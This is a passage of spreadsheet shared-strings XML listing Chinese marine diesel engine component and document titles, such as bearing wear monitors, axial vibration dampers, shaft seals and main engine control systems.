      <t>轴承磨损和油中水监测</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承磨损监测系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承磨损监测装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承磨损监视器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承磨损量规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承温度传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承校正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承压瓦测量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承制造商（白合金）</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承制造商（锡铝合金）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">PILLOW BLOCK FOR FUEL CONTROL LINKAGE
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>BRACKET FOR FUEL CONTROL LINDAGE</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴带发电机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴带发电机面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴带发电机要求</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴挡圈</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴颈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴颈轴承使用手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴块，液压闸盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴块，液压组</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴密封泵装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴密封盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴密封环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴密封适配法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴密封装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴锁紧装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦测量</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦焊接质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦及轴向减震器吊装</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴系布置标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴系图</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向承磨环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向导块安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向导块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向导块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向滚轮轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器测量说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器的质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器上部</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器下部</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器油封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向振动监测器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向振动监测器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向轴承衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向轴承盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴支撑，总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴制动器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主动阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主阀功能</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主管除气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主管系的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主滑油滤器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主滑油系统冲洗日志</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主滑油系统的冲洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主滑油系统的冲洗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Pe</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一览表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Pmax</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一览表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机操纵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机操纵侧操纵台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机操纵系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机超速刻度锁死</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机齿轮测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机串油建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机的需求空间</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机电缆布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机电缆接线图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机垫片，密封圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机断面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机放气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机辅助鼓风机控制设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机负荷控制面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机工作性能和状况</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机管连接图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机和辅机系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机监测</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机接口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统，定距桨，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>26-46 MC/MC-C</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统，定距桨，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>MC/MC-C</t>
